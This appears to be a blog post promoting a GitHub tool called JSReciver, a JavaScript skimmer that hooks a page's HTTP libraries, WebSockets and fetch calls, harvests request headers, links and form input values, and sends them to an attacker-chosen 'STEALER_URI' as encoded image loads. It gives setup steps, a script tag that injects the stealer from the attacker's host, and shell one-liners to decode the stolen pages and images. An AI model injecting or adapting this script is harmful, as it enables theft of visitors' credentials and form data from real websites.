https://github.com/jomoza/rejsciver
Let’s talk about my last GitHub project called JSReciver. This JavaScript script is a real game-changer when it comes to intercepting HTTP requests and doing some sneaky stuff. You won’t believe what this script can do!
🎯 What can JSReciver intercept?
JSReciver can intercept various types of HTTP requests made by different libraries and frameworks. It’s like a ninja lurking in the shadows, ready to pounce on requests made with:
- Axios
- Angular HttpClient
- jQuery Ajax
- Superagent
- Request
- Got
- Fetch Mock
- Vue Resource
🕵️ How does it work?
JSReciver is a master of disguise. It replaces the original functions used for making requests with modified versions that log information about the requests. So whenever a request is made using one of the supported libraries or frameworks, JSReciver jumps into action and logs all the juicy details, like the request URL, method, headers, and data, to the console. Sneaky, huh?
But wait, there’s more! JSReciver also has a secret weapon called stealInfo. This function exfiltrates the intercepted request information to a specified URL. It’s like a spy sending encoded messages. JSReciver encodes the request data and sends it as a series of images loaded from the exfiltration URL. Talk about stealth!
But that’s not all! JSReciver doesn’t stop at intercepting HTTP requests. It’s a versatile tool that can intercept other web-related operations too, like:
- WebSocket connections
- Beacon requests
- XMLHttpRequests
- Fetch API requests
JSReciver logs information about these operations and exfiltrates them in a similar manner as the intercepted HTTP requests. It’s like having eyes and ears everywhere on the web!
And there’s more! JSReciver goes beyond requests and operations. It’s like a nosy neighbor snooping around your webpage. It scans the webpage for elements with src or href attributes and logs and exfiltrates their values. It also collects data from HTML forms present on the page, including form actions, methods, and input field values. The form data is then logged and exfiltrated as well. No secret is safe from JSReciver!
💻 How to use JSReciver?
To use JSReciver, you need to create a web server and specify the exfiltration server URI. Here’s how to set it up:
Edit the variable let STEALER_URI = ‘’; and replace the empty string with your exfiltration server URI.
Prepare the server using the http-server package. Run the following command:
sudo http-server –port 8080 -a 0.0.0.0 -d -i –cors > exfiLeaks.log
Inject the JSReciver script into your webpage using the following HTML code:
1 | <script src="http://STEALER_URI:8080/reciver.js"></script> |
🚀 JSReciver Oneliners
Now let’s dive into some awesome oneliners that JSReciver provides for detecting and extracting information. One particularly interesting feature is the ability to detect headers of files encoded in Base64. This allows you to identify different types of files and perform specific operations based on their content.
These oneliners allow you to extract specific information from the intercepted requests and perform further analysis or processing as needed. Feel free to explore them and adapt them to your specific use cases.
Detect webpages hash:
1 | cat exfiLeaks.log | grep "/0/PCFET0NUWVBFIGh0bWw" | awk -F'/' '{print $3}' | awk '!seen[$1]++' |
Web pages:
1 | cat exfiLeaks.log | grep "/exfil/<hash>/" | cut -d"/" -f4- | awk '!seen[$1]++' | awk -F'.jpg' '{print $1}' | cut -d"/" -f2- | tr -d '\n' | base64 -d |
Detect images hash
1 | cat exfiLeaks.log | grep "/0/iVBORw0KGg" | awk -F'/' '{print $3}' | awk '!seen[$1]++' |
Images:
1 | cat exfiLeaks.log | awk -F'/exfil/<hash>/' '{print $2}' | cut -d"/" -f2- | awk -F'.jpg' '{print $1}' | awk '!seen[$0]++' | tr -d '\n' | base64 -d > tal.png |
Start server
Request recived
Extract content
🤖 So…
And that’s JSReciver. I hope you found this project fascinating and full of possibilities. Remember, with JSReciver, you can become a master of intercepting web requests and extracting valuable information.